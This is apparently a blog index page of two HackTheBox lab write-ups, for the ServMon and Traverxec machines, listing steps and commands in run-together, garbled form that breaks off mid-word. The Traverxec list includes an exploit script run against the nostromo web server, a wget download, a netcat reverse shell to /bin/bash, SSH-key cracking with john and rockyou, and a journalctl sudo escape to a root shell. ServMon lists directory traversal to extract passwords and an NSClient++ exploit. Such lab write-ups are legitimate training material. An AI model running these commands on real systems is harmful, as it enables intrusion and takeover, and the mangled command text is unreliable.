Hackthebox ServMon writeup

Basic Information Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved 1-nmap -sC -sV -O -p- -v -oV [email protected] c:\program files\nsclient++4-type nsclient.ini5-ssh

Hack the box(HTB) Traverxec write up

Commands used 1-nmap -sC -sV -O -v -oA initial getshell.py 80 "cd / && mkdir tmp"3-python getshell.py 80 "cd /tmp && wget"4-python getshell.py 80 "/tmp/nc -e /bin/bash 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a